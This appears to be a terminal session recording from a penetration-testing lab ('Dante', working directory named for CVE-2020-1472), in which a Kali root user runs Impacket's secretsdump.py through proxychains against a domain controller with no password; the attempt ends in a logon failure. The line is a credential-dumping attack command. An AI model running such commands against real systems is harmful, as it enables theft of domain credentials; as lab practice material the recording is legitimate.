[217.263589, "o", "\u001b[?2004h"]
[224.270735, "o", "\u001b[7m\u001b[36mproxychains4\u001b[39m\u001b[7m secretsdump.py DANTE.local/DANTE-DC01\\$@172.16.1.20 \u001b[7m\u001b[32m-no-pass\u001b[27m\u001b[39m"]
[224.914081, "o", "\u001b[73D\u001b[27m\u001b[36mp\u001b[27m\u001b[36mr\u001b[27m\u001b[36mo\u001b[27m\u001b[36mx\u001b[27m\u001b[36my\u001b[27m\u001b[36mc\u001b[27m\u001b[36mh\u001b[27m\u001b[36ma\u001b[27m\u001b[36mi\u001b[27m\u001b[36mn\u001b[27m\u001b[36ms\u001b[27m\u001b[36m4\u001b[39m\u001b[27m \u001b[27ms\u001b[27me\u001b[27mc\u001b[27mr\u001b[27me\u001b[27mt\u001b[27ms\u001b[27md\u001b[27mu\u001b[27mm\u001b[27mp\u001b[27m.\u001b[27mp\u001b[27my\u001b[27m \u001b[27mD\u001b[27mA\u001b[27mN\u001b[27mT\u001b[27mE\u001b[27m.\u001b[27ml\u001b[27mo\u001b[27mc\u001b[27ma\u001b[27ml\u001b[27m/\u001b[27mD\u001b[27mA\u001b[27mN\u001b[27mT\u001b[27mE\u001b[27m-\u001b[27mD\u001b[27mC\u001b[27m0\u001b[27m1\u001b[27m\\\u001b[27m$\u001b[27m@\u001b[27m1\u001b[27m7\u001b[27m2\u001b[27m.\u001b[27m1\u001b[27m6\u001b[27m.\u001b[27m1\u001b[27m.\u001b[27m2\u001b[27m0\u001b[27m \u001b[27m\u001b[32m-\u001b[27m\u001b[32mn\u001b[27m\u001b[32mo\u001b[27m\u001b[32m-\u001b[27m\u001b[32mp\u001b[27m\u001b[32ma\u001b[27m\u001b[32ms\u001b[27m\u001b[32ms\u001b[39m"]
[225.702188, "o", "\u001b[?1l\u001b>"]
[225.708118, "o", "\u001b[?2004l\r\r\n"]
[225.709384, "o", "[proxychains] config file found: /etc/proxychains4.conf\r\n"]
[225.709412, "o", "[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4\r\n"]
[225.710286, "o", "[proxychains] DLL init: proxychains-ng 4.17\r\n"]
[225.884707, "o", "Impacket v0.11.0 - Copyright 2023 Fortra\r\n\r\n"]
[225.886123, "o", "[proxychains] Strict chain  ...  107.173.157.111:32456 "]
[226.033331, "o", " ...  172.16.1.20:445 "]
[226.606866, "o", " ...  OK\r\n"]
[227.575876, "o", "[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)\r\n"]
[227.575915, "o", "[*] Cleaning up... \r\n"]
[227.616137, "o", "                                                                                                     \r\r"]
[227.616229, "o", "\u001b]0;root@kali: ~/Dante/CVE-2020-1472\u0007"]
[227.616685, "o", "\r\n"]
[227.646459, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34mâ”Śâ”€â”€(\u001b[1m\u001b[34m\u001b[31mrootă‰żkali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m~/Dante/CVE-2020-1472\u001b[0m\u001b[34m]\r\nâ””â”€\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[227.646542, "o", "\u001b[?1h\u001b="]
[227.647011, "o", "\u001b[?2004h"]
[230.850863, "o", "\u001b[?2004l\r\r\n"]
